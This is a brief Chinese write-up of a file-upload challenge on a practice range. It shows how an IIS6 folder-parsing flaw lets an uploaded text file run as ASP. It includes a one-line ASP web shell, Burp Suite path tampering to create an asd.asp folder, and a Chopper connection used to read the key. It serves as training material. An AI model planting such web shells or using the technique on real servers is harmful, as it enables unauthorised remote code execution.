在线靶场-墨者-文件上传1星-内部文件上传系统漏洞分析溯源

点击靶场网页,提示我们要上传一个文件,ii6有一个漏洞,在asp的文件夹下的txt也会被当做asp文件运行。所以我们先上传一个文本写入一句话木马<%eval request (“pass”)%>(pass可以根据自己喜好更改)。然后开启浏览器代理,运行burp suite,捕抓上传文件的数据包,抓到包后,把数据包send to Repeater。更改上传的路径将upload更改为asd.asp(xxx.asp),这样我们就创建了一个asp文件夹。
在线靶场-墨者-文件上传1星-内部文件上传系统漏洞分析溯源
接着使用菜刀输入IP地址加我们所创建的路径地址和文件,输入口令,木马类型。
在线靶场-墨者-文件上传1星-内部文件上传系统漏洞分析溯源
连接获取读取权限后,可看到KEY_2466610284.asp这个文件,打开该文件即可获得key。
在线靶场-墨者-文件上传1星-内部文件上传系统漏洞分析溯源